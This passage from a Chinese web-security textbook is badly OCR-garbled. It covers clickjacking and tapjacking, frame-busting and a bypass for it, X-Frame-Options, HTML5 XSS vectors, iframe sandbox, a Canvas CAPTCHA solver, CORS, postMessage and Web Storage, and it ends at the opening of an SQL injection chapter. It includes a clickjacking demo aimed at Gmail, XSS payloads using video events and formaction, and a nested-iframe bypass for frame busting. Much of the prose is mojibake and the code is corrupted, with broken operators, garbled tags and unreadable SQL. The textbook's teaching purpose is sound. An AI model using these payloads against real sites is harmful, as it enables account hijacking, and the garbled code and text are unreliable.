<img id="hide_ball" src=ball.png 
class="ball"> 
<div id="source"> 
<iframe id="iframe_1" 
src="https://mail.google.com/mail/ig/mailmax" 
class="iframe_hidden" 
scrolling="no"> 
</iframe> 
</div> 
<img src=Dolphin.jpg class="Dolphin"> 
<div> 
«img id-"hide ball 1" src=ball.png 
class-"ball 1"» 
«/div» 
«div» 
«textarea id="target" 
class-"text area hidden'"» 
</textarea> 
</div> 
<div id="info" 
style="position: absolute; background- 
color: #e0e0e0; font-weight: bold; 
top: 600px;"> 
</div> 
<center> 
Note: Clicking "ctrl + a" to select 
the ball, then drag it to the 


«br» 
mouth of the dolphin with the 
mouse.Make sure you have logged into GMAIL. 
«br» 
</center> 
<br> 
<br> 
«div class="center"> 
<center> 
<center> 
<input id="showHide_frame" 
type="checkbox" 
onclick="showHide_frame.call(this);" 
/> 
<label for="showHide_frame"> 
Show the jacked I--Frame 
</label> 
| 
«input id-"showHide text" 
type-"checkbox" 
onclick="showHide_text.call(this);" 
/> 
<label for="showHide_text"> 
Show the jacked Textarea 
</label> 
| 
«input type-button value="Replay" 
onclick="location.reload();reload_text();"> 
</center> 
<br><br> 
<b> 
Design by 
<a target="_blank" 
hrefz"http://hi.baidu.com/xisigr"» 
xisigr 
</a> 
</b> 
</center> 
</div> 
</body> 
</html> 


这 是 一 个 非常 精彩 的 案例 。 


5.5 ClickJacking 3.0: 触 屏 劫持 

到 了 2010 年 9 月 ， 智 能 手机 上 的 “和 触 屏 支持 ?攻击 被 斯 坦 福 的 安全 研究 者 
AD, dU 意味 着 ClickJackinig 的 项 击 方式 更 进一步 ° 安全 人 研究 者 将 这 种 
触 屏 动 持 称 为 TapJacking ° 

以 苹果 公司 的 iPhone 为 代表 ， 乔 能 手机 为 人 们 提供 了 更 先进 的 操控 方 
式 : 触 屏 。 从 手机 OS 的 角度 来 看 ， 触 屏 实际 上 就 是 一 个 事件 ， 手 机 
OS 捕捉 这 些 事件 ， 并 执行 相应 的 动作 。 

比如 一 次 触 屏 操作 ， 可 能 会 对 应 以 下 几 个 事件 : 


。 touchstart， 手 指 和 触摸 屏幕 时 发 生 ; 
。touchend， 手 指 离 开 屏 幕 时 发 生 ; 
。touchmove， 手 指 请 动 时 发 后 ; 

e touchcancel， 系 统 可 有 取消 touch 事 件 。 


~o a 当前 网 页 上 ， 可 以 支持 用 户 的 触 屏 
E o 


fi BESTE I BH Fe, d 

而 手机 上 的 屏幕 范围 有 限 ， 手 机 浏览 器 为 了 而 约 空间 ， 甚 至 隐藏 了 地 
次 骗 可 能 会 变 得 更 加 容易 实施 。 比 如 下 面 这 
Sal: 


手机 屏幕 的 视觉 欺骗 
左边 的 图 片 ， 最 上 方 显 示 了 浏览 嚣 地址 栏 ， 同 时 攻击 者 在 页 面 中 画 出 
了 一 个 假 的 地 址 栏 ; 

中 间 的 几 片 ， 真 实 的 浏览 器 地 址 栏 已 经 目 动 隐藏 了 了 ， 此 时 页 面 中 只 晋 
下 假 的 地 址 栏 ; 

右边 的 图 片 ， 是 浏览 器 地 址 栏 被 正常 隐藏 的 情况 。 

这 种 针对 视觉 效果 的 攻击 可 以 被 利用 进行 钓鱼 和 欺诈 。 

2010 年 12 月 ， 研 究 者 发 现在 Android 系 统 中 实施 TapJacking 甚 至 可 以 修 
改 系统 的 安全 设置 ， 并 同时 给 出 了 演示 。 

在 未 来 ， 随 着 移动 设备 中 浏览 锅 功 能 的 丰富 ， 也 许 我 们 会 看 到 更 多 
TapJacking 的 攻击 方式 。 


5.6 ”防御 ClickJacking 

ClickJacking 是 一 种 WS, ALA RIT ENE? 针对 传统 的 
ClickjJacking， 一 般 是 通过 禁止 路 域 的 iframe 来 防范 。 

5.6.1 frame busting 

i aJ DAE — ExJavaScriptfe 82, LASS IEiframeB CS 9 XAT T AY 
frame busting。 比 如 下 面 这 段 代码 : 


if ( top.location !- location ) ( 
top.location - self.location; 


常见 的 frame busting 有 以 下 这 些 方式 : 


if (top != self) 


if (top.location !- self.location) 
if (top.location !- location) 

if (parent.frames.length » 0) 

if (window !- top) 

if (window.top !-- window.self) 

if (window.self !- window.top) 


if (parent && parent !- window) 

if (parent && parent.frames && 
parent.frames.length>0) 

if ((self.parent&&! 

(self .parent===self) )&&(self.parent.frames.le 
ngth!=0) ) 

top.location = self.location 
top.location.href = document.location.href 
top.location.href = self.location.href 
top.location.replace(self.location) 
top.location.href = window. location.href 
top. location. replace(document. location) 
top.location.href = window. location. href 
top.location.href = "URL" 

document .write('') 

top.location = locati 

top.location. replace document. location) 
top.location.replace('URL') 
top.location.href - Nonne location 
top.location.replace(window.location.href) 
top.location.href - location.href 
self.parent.location - document.location 
parent.location.href - self.document.location 
parent.location - self.location ; 


AB A 385 过 以 下 方式 即 可 经 过 才 上 面 的 保护 代码 : 


Attacker top frame: 

«iframe src="attacker2 .html"> 
Attacker sub-frame: 

<iframe src="http://www.victim.com"> 


此 外 ， 像 HTML 5+ iframe Hy sandbox }& TE ` IE Piframe fH security JB ME 
=, dn] DPR Hl iframe 页面 中 的 JavaScript 脚 本 执行 ， 从 而 可 以 使 得 
frame busting 失 效 。 

斯 坦 福 的 Gustav Rydstedt 等 人 总 结 -篇 关于 “攻击 frame busting” 的 
paper: “Busting framebusting: a study of clickjacking vulnerabilities 
atpopular sites”， 详 细 讲 述 了 各 种 绕 过 framebusting 的 方法 。 

5.6.2 X-Frame-Options 

因为 frame busting 存 在 被 绕 过 的 可 能 ， 所 以 我 们 需 要 寻找 其 他 更 好 的 解 
决 方案 。 一 个 比较 好 的 方案 是 使 用 一 个 HTTP 3k ——X-Frame- 
Options。 


X- Frame-Options 可 以 说 是 为 了 解决 Click-Jacking 而 生 的 ， 目前 有 以 下 
iu bt at JP AB x fF X-Frame-Options: ?IE 8+ ?Opera 10.50+ ?Safari 4+ ? 
Chrome 4.1.249.1042+ ?Firefox 3.6.9 (or earlier with NoScript) 


它 有 三 个 可 选 的 值 : 


« DENY 
e SAMEORIGIN 
e ALLOW-FROM origin 


-MBÉZJDENYHBI, Aare JEE 3 BU eee (El frame HM; AEN 
SAMEORIGIN， 则 frame 页 面 的 地 址 只 能 为 同 源 域名 下 的 页 面 ; TER 
为 AL-LOW-FROM， 则 可 以 定义 允许 frame 加 载 的 页 面 地 址 。 

除 f X-Frame-Options 之 外 Firefox 的 “Content Security Policy” Pl 及 
Firefox 的 No-Script 扩 展 也 能 够 有 效 防御 ClickJacking， 这 些 方案 为 我 们 
提供 了 更 多 的 选择 。 


5.7 ”小结 

本 章 讲述 了 一 种 新 客户 端 攻击 方式 : Click-Jacking ° 
ClickJacking 相 对 于 XSS 与 CSRF 来 说 ， 因 为 需要 诱 使 用 户 与 页 面 产 生 交 
互 行为 ， 因 此 实施 攻击 的 成 本 更 高 ， 在 网 络 犯罪 中 比较 少见 。 但 Click- 
puc 9 可 能 被 攻击 者 利用 在 钓鱼 、 其 诈 和 广告 作弊 等 


第 6 章 HTML 5 安全 


HTML 5 是 W3C 制 定 的 新 一 代 HTML 语 言 的 标准 。 这 个 标准 现在 还 在 不 
时 地 修改 ， 但 是 主流 的 浏览 器 厂 商都 已 经 开始 逐渐 支持 这 些 新 的 功 
能 。 离 HIML 5 真正 的 普及 还 有 很 长 一 段 路 要 走 ， 但 是 由 于 浏 贤 絮 已 
经 开始 支持 部 分 功能 ， 所 以 HTML 5 的 影响 已 经 显现 ， 可 以 预见 到 ， 
在 移动 互联 网 领域 ，HTML 5 会 有 着 广阔 的 发 展 前 景 。HTML Siok T 
新 的 功能 ， 也 融 来 了 新 的 安全 挑战 。 本 章 将 介绍 HTML 5 的 一 些 新 功 
能 及 其 可 能 带 来 的 安全 问题 。 有 些 功能 非 HIML 5 标准 ， 但 也 会 在 本 
章 中 一 起 进行 介绍 。 


61 HTML 5 新 标签 
6.1.1 新 标签 的 XSS 
HTML 5 定义 了 很 多 新 标签 、 新 事件 ， 这 有 可 能 带 来 新 的 XSS 攻 击 。 
一 些 XSS Filter 如 果 建 立 了 一 个 黑 名 单 的 话 ， 则 可 能 就 不 会 覆盖 到 
HTML 5 新 增 的 标签 和 功能 ， 从 而 避免 发 生 XSS。 
笔者 曾经 在 百度 空间 做 过 一 次 测试 ， 使 用 的 是 HTML 5 中 新 增 的 
<video> 标 签 ， 这 个 标签 可 以 在 网 页 中 远程 加 载 一 段 视频 。 与 <video> 标 
签 类 似 的 还 有 <audio> 标 签 ， 用 于 远程 加 载 一 段 音频 。 
测试 如 下 : 

Fe. ng cookie) 

ondurationchanged-"alert(/XSS2/);" 


ontimeupdate-"alert(/XSS1/);" tabindex="0"></ 
video» 


成 功 地 绕 过 了 百度 空间 的 XSS Filter: 
AMES TE eB 


Security just lik3 a girl. BOth of th3m h4ve sOme hOles. YOu alw4ys try to find the hOle, but nOt 3very ti 
主页 “博客 ”相册 | 个 人 档案 | 好 友 | 管理 中 心 


文章 列表 
XSS Test 


百度 空间 的 XSS 


HTML 5 中 新 增 的 一 些 标 签 和 属性 ， 使 得 XSS 等 Web 攻 击 产 生 了 新 的 变 
化 ， 为 了 总 结 这 些 变 化 ， 有 安全 研究 者 建立 了 一 个 HTMLS5 Security 
Cheat-sheet 项 目 ， 如 下 所 示 : 


Have a look at the eye-friendly HTML5 version (http://html5sec.orq/) of the cheat sheet showing the vectors and the detailed 
descriptions as well as click-to-see examples and more. 


eform ide" test'»«/form» cbutton form="test" formactions"javascript:alert(1)"»X 
...Will be stored in JSON like this: 


{ ae ID 1 - X55 via OPER on - requiring user interaction */ 
ud' 


,category ' : ih, 

‘name ' 

; 'en' : 'X5S via formaction - requiring user interaction' 

'd ata' : ‘eform id="test" /s«button form="test" formactionz"Xjs uri alert&"»X', 


‘description’: { 
'en' : 'A vector displaying the HTML5 for ...side the actual form. ' 


‘tickets! fly 
‘howtofix' | : ; 
'en' : ‘Don\'t allow users to submit markup ... forms as well as submit buttons. ' 
‘browsers’ cT 
'opera': ['10.5'] 
‘tags’ D X55, "tmo , "ff^, ge], 
'reporter' : mario’ 


此 项 目 对 研究 HTML 5 安全 有 着 重要 作用 。 
6.1.2 iframe 的 sandbox 


<iframe> prg — 直 以 来 都 为 人 所 诉 病 。 挂 马 、XSS、ClickjJacking 等 攻击 
中 都 能 看 到 它 不 光彩 的 身影 。 浏 斋 器 广 商 也 一 直 在 想 办 法 限制 iframe 执 
行 脚本 的 权限 ， 比如 跨 窗 口 访问 会 有 限制 ， 以 及 下 中 的 <iframe> 标 签 文 
持 security 属 性 限制 脚本 的 执行 ， 都 在 向 着 这 一 目标 努力 。 


在 HTML 5 中 ， 专 门 为 iframe 定 义 了 一 个 新 的 属性 ， 叫 sandbox。 使 用 
sandbox 这 一 个 属性 后 ，<iframe> 标 签 加 载 的 内 容 将 被 视 为 一 个 独立 
的 “ 源 ”( 源 的 概念 请 参考 “ 同 源 策略 ”) ， 其 中 的 脚本 将 被 禁止 执行 ， 表 
PE 插件 被 禁止 加 载 ， 指 向 其 他 浏览 对 象 的 链接 也 会 被 禁 


p T nf Dt B BOR SCH EEIE ll ^ ALAR LM n] bat 


择 : 


e allow-same-origin: 允许 同 源 访问 |; 

e allow-top-navigation: 人 允许 访问 顶层 窗口 ; 
e allow-forms: 人 允许 提交 表单 ; 

e allow-scripts: 允许 执行 脚本 。 


可 有 的 行为 即便 是 设置 了 allow-scripts ， 也 是 不 允许 的 ， 比 如 “弹出 窗 
[]? e 


一 个 iframe 的 实例 如 下 : 


<iframe sandbox="allow-same-origin allow- 

forms allow-scripts" 
src="http://maps.example.com/ 

embedded.html"></iframe> 


疑问 ，iframe 的 sandbox 属 性 将 极 大 地 增强 应 用 使 用 iframe 的 安全 
6.1.3 Link Types: noreferrer 


TE HTML 5 中 为 <a> 标 签 和 <area> 标 签 定 义 了 一 个 新 的 Link Types : 
noreferrer ° 


顾名思义 ， 标 签 指 下 了 noreferrer 后 ， 浏 贤 絮 在 请 求 该 标签 指定 的 地 址 
时 将 不 再 发 送 Referer 。 
«a href="xxx" rel="noreferrer" >test</a> 
这 种 设计 是 出 于 保护 敏感 信息 和 隐私 的 考虑 。 因 为 通过 Referer， 可 能 
n: ie o 

个 标签 需要 开发 者 手动 添加 到 页 面 的 标签 中 ， 对 于 有 需求 的 标签 可 
以 选择 全 用 noreferrer ° 
6.1.4 ”Canvas 的 妙用 
Canvas 可 以 说 是 HTML 5 中 最 大 的 创新 之 一 。 不 同 于 <img> 标 签 只 是 远 
程 加 载 一 个 图 片 ，<canvas> 标 签 让 JavaScript 可 以 在 页 面 中 直接 操作 图 
片 对 象 ， 也 可 以 直接 操作 像素 ， 构 造 出 图 片区 域 。Canvas 的 出 现 极 大 
BUDE Tot es EET mate CEA HL, FREE DAH Canvas N 5i, 

佛 上 写 一 个 小 游戏 。 

下 面 是 一 个 简单 的 Canvas 的 用 例 。 


!DOCTYPE HTML» 
ane 


«body» 

«canvas id-"myCanvas" width="200" 
height="100" style="border:1px solid 
#c3c3c3; "> 

Your browser does not support the canvas 
element. 

</canvas> 

<script type="text/javascript"> 

var c-document.getElementById("myCanvas"); 
var cxt=c.getContext("2d"); 
cxt.fillStyle-"4FF0090"; 
cxt.fillRect(0,0,150,75); 

«/script» 


TEsChrCanvas Joss P. WHiau — T AUT e 


1£ x f Canvas) jl bias 38/22 8 Fe] Fr 
在 以 下 浏览 右 中 ， 开 始 文 持 <canvas> 标 签 


e [E 7.0+ 

e Firefox 3.0+ 
e Safari 3.0+ 
e Chrome 3.0+ 
e Opera 10.0+ 
e iPhone 1.0+ 
e Android 1.0+ 


Dive Into HTML5 很 好 地 介绍 了 Canvas 及 其 他 HTML 5 的 特性 。 


Canvas 提 供 的 强大 功能 ， 甚 至 可 以 用 来 破解 验证 码 。Shaun Friedle 写 了 
一 个 GreaseMonkey 的 脚本 ， 通 过 JavaScript 操 作 Canvas 中 的 每 个 像素 
点 ， 成 功 地 自动 化 识别 了 Megaupload 提 供 的 验证 码 。 


na GWL MYO 
Megaupload 验 证 码 

其 大 致 过 程 如 下 。 

首先 ， 将 图 片 导 入 Canvas， 并 进行 转换 。 


function convert_grey(image_data){ 
for (var x = 0; x < image data.width; x++){ 
for (var y = 0; y « image data.height; y+ 
+){ 
var i = x*4+y*4*image_data.width; 


Math.floor(image data.data[i] * 299/1000 + 
image data.data[i*-1] * 587/1000 + 
image data. rea ati MM 114/1008); 
image data.data[i] - luma 
image data.data[i*1] = Luma; 
image_data.data[i+2] = luma; 
image data.data[i*3] = 255; 


j^ 


2 8 所 不 同 字 符 ， 此 处 很 简单 ， 因 为 三 个 字符 都 使 用 了 不 同 颜色 。 


filter(image data[0], 105); 
filter(image data[1], 120); 
filter(image data[2], 135); 
function filter(image data, colour){ 
for (var x = 0; x « image data.width; x++){ 
for (var y = 0; y « image data.height; y+ 
+){ 
var i = x*4+y*4*image_data.width; 
// Turn all the pixels of the certain 
colour to white 
if (image_data.data[i] == colour) { 


image data.data[i] = 255; 
image data.data[i*1] = 255; 
image data.data[i*2] - 255; 
// Everything else to black 
} eise { 


image_data.data[i] = 0; 
image data.data[i*1] = 0; 
image data.data[i*2] = 0; 


} 
} 
} 


将 字符 从 背景 中 分 离 出 来 ， 判 断背 景 颜色 即 可 
将 字符 从 至 景 中 分 离 , FUT TRB BN ° 
var i = x*4+y*4*image_data.width; 
var above = x*4+(y-1)*4*image_data.width; 
var below = x*4+(y+1)*4*image_data.width; 
if (image_data.data[i] == 255 && 
image_data.data[above] == 0 && 
image_data.data[below] == 0) { 
image_data.data[i] = 0; 
image data.data[i*1] = 0; 
image data.data[i*2] - 0; 


再 将 结 采 重新 绘制 。 
ht MM LAM 


var edges - find edges(image data[i]); 
cropped canvas.getContext("2d").drawImage(can 
vas, edges[0], edges[1], 

edges[2]-edges[0], edges[3]-edges[1], ©, 9, 
edges[2]-edges[0], edges[3]-edges[1]); 
image data[i] - 
cropped canvas.getContext("2d").getImageData( 
0, 6, 

cropped canvas.width, 
cropped canvas.height); 


完整 的 实现 可 以 参考 前 文 注释 中 所 到 的 User-Scripts 代 码 。 
在 此 基础 上 ， 作 者 甚至 能 够 破解 一 些 更 为 复 洒 的 验证 码 ， 比 如 : 


c berecoaethelizards, co. uk 


Ie D & 


破解 验证 码 
通过 Canvas 上 自动 破解 验证 码 ， 最 大 的 好 处 是 可 以 在 浏览 器 环境 中 实现 
情 ， 变 为 可 能 。 


6.2 ”其 他 安全 问题 

6.2.1 Cross-Origin Resource Sharing 

浏览 器 实现 的 同 源 策 略 (Same Origin Policy) 限制 了 脚本 的 跨 域 请 
求 。 但 互联 网 的 发 展 趋势 是 越 来 越 开 放 的 ， 因 此 路 域 访问 的 需求 也 变 
得 越 来 越 迫 切 。 同 源 策略 给 Web 开 发 者 市 来 了 很 多 困扰 ， 他 们 不 得 不 
想方设法 地 实现 一 些 “ 合 法 ”的 跨 域 技术 ， 由 此 诞生 了 jsonp、iframe 跟 
域 等 技巧 。 

W3C 委 员 会 决定 制定 一 个 新 的 标准 来 解决 日 益 迫 切 的 跨 域 访 问 问题 。 
这 个 新 的 标准 叙述 如 下 。 


[Bui M http://www.a.com/test.html & #8 — “+ £5 $ AY) XMLHttpRequest 35 
求 ， 请 求 的 地 址 为 : http;//www.b.com/test.php ° 


«script» 
var client - new Mcd dE 
client.open("GET" http://www.b.com/ 
test.php"); 
client. VITE change = function() { } 
client.send(nu 
</script> 


如 果 是 在 IE 8 中 ， 则 需要 使 用 XDomainRe-quest 来 实现 跨 域 请 求 。 


var request = new XDomainRequest(); 
request.open("GET", xdomainurl); 
request.send(); 


如 果 服 务 器 www.b.com 返 回 一 个 HTTPHeader: www.b.com 


Access-Control-Allow-Origin: http://www.a.com 


代码 如 下 : 


«?php 
header("Access-Control-Allow-Origin: *"); 
?» 


那么 这 个 来 自 http://www.a.com/test.html 的 跨 域 请 求 束 会 被 通过 。 


在 这 个 过 程 中 ，http://www.a.com/test.html 发 起 的 请 求 还 必须 带 上 一 个 
Origin Header: 


Origin: http://www.a.com 


WWW. a. com www. b. com 


test. html igi test. php 


Access-Control-Allow-Origin 


跨 域 请 求 的 访问 过 程 
在 Firefox 上 ， 可 以 抓 包 分 析 这 个 过 程 。 


GET http://www.b.com/test.php HTTP/1.1 
Host: www.b.com 

User-Agent: Mozilla/5.0 (Windows; U; Windows 
NT 5.1; zh-CN; rv:1.9.1b2) Gecko/20081201 
Firefox/3.1b2 Paros/3.2.13 

Accept: text/html,application/xhtml 
*-xml,application/xml;q-0.9,*/*;q-0.8 
Accept-Language: zh-cn,zh;q-0.5 
Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7 
Keep-Alive: 300 

Proxy-Connection: keep-alive 

Referer: http://www.a.com/test.html 
Origin: http://www.a.com 

Cache-Control: max-age=0 

HTTP/1.1 200 OK 

Date: Thu, 15 Jan 2009 06:28:54 GMT 
Server: Apache/2.0.63 (Win32) PHP/5.2.6 
X-Powered-By: PHP/5.2.6 
Access-Control-Allow-Origin: * 
Content-Length: 28 

Content-Type: text/html 

Cross Domain Request Test! 


Origin Header T ENiGHTTPAEBBJ* JR", ARS aso LIE ALI DUI ot as 
动 带 上 的 这 个 OriginHeader， 来 判断 浏览 器 的 请 求 是 否 来 自 -个 合 
的 “ 源 ”。 Origin Header 可 以 用 于 防范 CSRE， 它 不 像 Referer 那 么 容易 被 
伪造 或 清空 。 


在 上 面 的 例子 中 ， 服 务 右 端 返 回 : 


Access-Control-Allow-Origin: * 


从 而 允许 客户 端的 跨 域 请 求 通过 。 在 这 里 使 用 了 通配符 “”， 忆 十 极 雄 
JS BRIT, EHREIBIFIE EL CRANE RG IR] BEI © XAA RF lash R 
I F allow-access-from: 一 样 ， 等 于 没有 做 任何 安全 限制 。 

e aa 问 的 标准 ， 还 有 许多 HTTPHeader 可 以 用 于 进行 更 精确 
控制 ， 


4 Syntax 

4.1 Access-Control-Allow-Origin HTTP 
Response Header 

4.2 Access-Control-Max-Age HTTP Response 
Header 

4.3 Access-Control-Allow-Credentials HTTP 
Response Header 

4.4 Access-Control-Allow-Methods HTTP 
Response Header 

4.5 Access-Control-Allow-Headers HTTP 
Response Header 

4.6 Origin HTTP Request Header 

4.7 Access-Control-Request-Method HTTP 


Request Header 
4.8 Access-Control-Request-Headers HTTP 
Request Header 


有 兴趣 的 读者 可 以 目 行 参 阅 W3C 的 标准 。 
跨 窗 口传 递 


6.2.2 postMessage 


消息 

在 “ 跨 站 脚本 攻击 "一 章 中 ， 曾 经 提 到 利用 window.name 来 跨 窗口 、 跨 域 
传递 信息 。 实 际 上 ，window 这 个 对 象 几 乎 是 不 受 同 源 策略 限制 的 ， 很 
多 脚本 攻击 都 巧妙 地 利用 了 window 对 象 的 这 一 特点 。 


在 HTML 5 中 ， Al T -F Ei Web7T X TE HIRE , 制定 了 一 个 新 的 API: 
postMessage。 在 Firefox 3 ^ IE 8 ^ Opera 9 等 浏览 器 中 ， 都 已 经 开始 支 
持 这 个 API。 

DM s window (包括 当前 窗口 、 弹 出 窗口 、 es 
T) 对 象 往 其 他 的 窗口 发 送 文 本 消息 ， 从 而 实现 跨 窗口 的 消息 传递 

这 个 功能 是 不 受 同 源 策略 限制 的 。 

John Resig 在 Firefox 3 下 写 了 一 个 示例 以 演示 postMessage 的 用 法 。 


发 送 窗口 : 


<iframe src="http://dev.jquery.com/~john/ 
message/" id-"iframe"»«/iframe 
«form id="form"> 
<input type="text" id="msg" value="Message 
to send"/» 
«input type-"submit"/» 
«/form» 
«script» 
window.onload = function(){ 


win = 
document.getElementById("iframe").contentWind 
OW; 


document.getElementById("form").onsubmit - 
function(e){ 


win.postMessage( document.getElementById("msg 
").value ); 


YN 


}; 
</script> 


接收 窗口 : 


<b>This iframe is located on dev.jquery.com</ 
b> 


e.preventDefault(); 


«div id="test">Send me a message!</div> 

«script» 

document.addEventListener("message", 

function(e) 

document.getElementById("test").textContent - 
e.domain + " said: " + 

e.data; 

}, false); 

«/script» 


fg MW. AXEBD S AXES: 而 在 接收 窗口 中 ， 需 要 绑 定 
一 个 message 事 件 ， 监 听 其 他 窗口 发 来 的 消息 。 这 是 两 个 窗口 之 间 的 一 
个 “约定 ”>， 如 果 没 有 监听 这 个 事件 ， un E 
在 使 用 postMessage0 时 ， 有 两 个 安全 问题 需要 注意 

(1) 在 必要 时 ， 可 以 在 接收 窗口 验证 Domain, TOn 以 防 
E TIRE e 这 实际 上 是 在 代码 中 实现 一 次 同 源 策 略 的 验 
L 过 

(2) SEDIT, 接收 的 消息 写 入 textContent， 但 在 实际 应 用 中 ， 如 果 
将 消息 写 入 innerHIML ， 甚 至 直接 写 入 script 中 ， 则 可 能 会 导致 
DOMbased XSS 的 产生 。 根 据 *Secure By Default” JA T. 在 接收 窗口 不 
应 该 信任 接收 到 的 消息 ， 而 需要 对 消息 进行 安全 检查 。 


使 用 postMessage， 也 会 使 XSS Payload 变 得 更 加 的 灵活 。Gareth Heyes 
经 实现 过 一 个 JavaScript 运 行 环境 的 sandbox， 其 原理 是 创建 一 个 
iframe ， 将 JavaScript 限 制 于 其 中 执行 。 但 笔者 经 过 研究 发 现 ， 利 用 
postMessage() 给 父 窗 口 发 送 消 息 ， 可 以 突破 此 sandbox。 类 似 的 问题 可 
能 还 会 存在 于 其 他 应 用 中 。 

6.2.3 Web Storage 

在 Web Storage 出 现 之 前 ，Gmail 的 离线 浏览 功能 是 通过 Google Gears 3E 
现 的 。 但 随 着 GoogleGearsH] 天 折 ，Gmail 转 投 Web Storage 的 怀抱 。 目 
前 Google 从 众多 的 产品 线 比 如 Gmail、GoogleDocs 等 所 使 用 的 离线 浏览 功 
能 ， 都 使 用 了 WebStorage。 

StoragelJE? 过 去 在 浏览 器 里 能 够 存储 信息 的 方法 有 以 


e Cookie 
e Flash Shared Object 
e [E UserData 


其 中 ，Cookie 主 要 用 于 保存 登录 凭证 和 少量 信息 ， 其 最 大 长 度 的 限制 
决定 了 不 可 能 在 Cookie 中 存储 太 多 信息 。 而 Flash Shared Object 和 IE 
User-Data 则 是 Adobe 与 微软 目 己 的 功能 ， 并 未 成 为 一 个 通用 化 的 标 
准 。 因此 W3C 委 员 会 会 硕 望 能 在 客户 端 有 一 个 较为 强大 和 方便 的 本 地 存 
储 功能 ， 这 束 是 Web Storage 。 
Web Storage 4} 7j Session Storage 和 LocalStorage ° Session Storage Hi] 
浏览 器 束 会 失效 ， 而 Local Storage lS — E f£ f£ ° Web Storage si f — 
个 非 关 系 型 数据 库 ， 由 Key-Value 对 组 成 ， 可 以 通过 JavaScript 对 其 进行 
探 作 。 目 前 Firefox 3 和 IE 8 都 实现 了 Web Storage。 使 用 方法 如 下 : 


。 设置 一 个 值 : window.sessionStor-age.setItem(key, value); 
e 读 取 一 个 值 : window.sessionStor-age.getItem(key); 


此 外 ，Firefox 还 单独 实现 了 一 个 globalStor-age， 它 是 基于 SQLite 实 现 
"E 


window.globalStorage.namedItem(domain).setIte 
m(key, value); 


下 面 这 个 例子 展示 了 Web Storage 的 使 用 。 


«div id="sessionStorage_show"> 
sessionStorage Value: 
«/div» 
«br» 
«div id-"localStorage show"» 
localStorage Value: 
«/div» 
«input id="set" type="button" value="check" 
onclick="set();"> 
<script> 
function set(){ 
window. sessionStorage.setItem("test", 
"this is sessionStorage"); 
if (window. globalStorage) { 


window. globalStorage.namedItem("a.com").setIt 
em("test", "this is LocalStorage"); 

yelse{ 

window. localStorage.setItem("test", 
"this is LocalStorage"); 


} 


document.getElementById("sessionStorage show" 
).innerHTML += 
window.sessionStorage.getItem("test"); 

if (window.globalStorage)[ 


document.getElementById("localStorage show"). 
innerHTML += 


window.globalStorage.namedItem("a.com").getIt 
em("test"); 
jelset 


document.getElementById("localStorage show").innerHTML += 
window. localStorage.getItem("test"); 


} 

} 

set(); 

</script> 
运行 结果 如 下 : 
EE "ET om 


ZRO «up sem aw TAG Why 
D X IU MEI 


sesciceStorage Value: this is seesionStcrage 


localSterage Value: this is LecelSterage 


ees] 


测试 页 面 
Web Storage 也 受到 同 源 策 上 略 的 约束 ， 每 个 域 所 拥有 的 信息 只 会 保存 在 
目 己 的 域 下 ， 如 下 例 : 


<body> 

<script> 

if (document.domain == "www.a.com"){ 
window. localStorage.setItem("test",123); 


alert(window.localStorage.getItem("test")); 


</script> 
</body> 


运行 结果 如 下 


OS ip (ewe © dant n Me 
[ano mey my RAW TAD Why —— 
EL (jip /fr et bad 


读 取 localStorage 
当 域 变化 时 ， 结 果 如 下 : 


跨 域 时 无 法 读 取 localStorage 

Web Storage 让 Web 开 发 更 加 的 灵活 多 变 ， 它 的 强大 功能 也 为 XSS 
Payload 大 开 方 便 之 站 。 攻 击 者 有 可 能 将 恶意 代码 保存 在 Web Storage 
中 ， 从 而 实现 路 页面 攻击 。 

当 Web Storage 中 保存 有 敏感 信息 时 ， 也 可 能 会 成 为 攻击 的 目标 ， 而 
XSS 攻 击 可 以 完成 这 一 过 程 。 

可 以 预见 ，Web Storage 会 被 越 来 越 多 的 开发 者 所 接受 ， 与 此 同时 ， 也 
将 市 来 越 来 越 多 的 安全 挑战 。 


63 ”小结 

HTML 5 是 互联 网 未 来 的 大 势 所 趋 。 虽 然 目前 距离 全 面 普及 还 有 很 长 
的 路 要 走 ， 但 随 着 浏览 器 开始 支持 越 来 越 多 的 HTML 5 功能 ， 攻 击 面 
也 随 之 产生 了 新 的 变化 。 攻 击 者 有 可 能 利用 HTML 5 中 的 一 些 特性 ， 
来 绕 过 一 些 未 及 时 更 新 的 防御 方案 。 要 对 抗 这 些 “ 新 型 ”的 攻击 ， 就 必 
须 了 解 HTML 5 的 方方面面 。 

对 于 HTML 5 来 说 ， 在 移动 互联 网 上 的 普及 进程 也 许 会 更 快 ， 因 此 未 
来 HTML 5 攻防 的 主 战场 ， 很 可 能 会 发 生 在 移动 互联 网 上 。 


第 三 篇 服务 端 应 用 安全 
第 7 章 ”注入 攻击 


注入 攻击 是 Web 安 全 领域 中 一 种 最 为 第 见 的 攻击 方式 。 在 “ 跨 站 脚本 攻 
击 ” 一 革 中 曾经 提 到 过 ，XSS 本 质 上 也 是 一 种 针对 HTML 的 注入 攻击 。 
而 在 “我 的 安全 世界 观 ” 一 章 中 ， 提 出 了 一 个 安全 设计 原则 一 一 “数据 与 
代码 分 离 ” 原 则 ， 它 可 以 说 十 专门 为 了 解决 注入 攻击 而 生 的 。 注 入 攻击 
的 本 质 ， 是 把 用 户 输 入 的 数据 当做 代码 执行 。 这 里 有 两 个 关键 条 件 ， 
第 一 个 是 用 户 能 够 控制 输入 ; 第 二 个 是 原本 程序 要 执行 的 代码 ， 拼 接 
了 用 户 输 入 的 数据 。 在 本 章 中 ， 我 们 会 分 别 探讨 几 种 常见 的 注入 攻 
击 ， 以 及 防御 办 法 。 


71 SQL 注入 

在 今天 ，SQL 注 入 对 于 开发 者 来 说 ， 应 该 是 耳熟能详 了 。 而 SQL 注入 第 
一 次 为 公众 所 知 ， 是 在 1998 年 的 著名 黑客 杂志 《Phrack》 第 54 期 上 , 一 
位 名 叫 rfp 的 黑客 发 表 了 一 篇 题 为 “NT Web Tech-nology Vulnerabilities” 的 
文章 。 

在 文章 中 ， 第 一 次 向 公众 介绍 了 这 种 新 型 的 攻击 技巧 。 下 面 是 一 
b ^ dod due 


Shipcity; 
Shi ipei ty - ba eque ap ie MA d ee ty"); 
elec Table whe 
Shi mes ty = oy M m a num 


变量 Shipcity 的 值 由 用 户 提交 ， 在 正常 情况 下 ， 假 如 用 户 得 
入 “Baijing”， 那 么 SQL 语句 会 执行 : 


SELECT * FROM OrdersTable WHERE ShipCity = 
'Beijing' 


但 假如 用 户 输入 一 段 有 语义 的 SQL 语句 ， 比 如 


那么 ，SQL 语 句 在 实际 执行 时 束 会 如 下 : 


i X FROM OrdersTable Deni Shi hipet ty = 
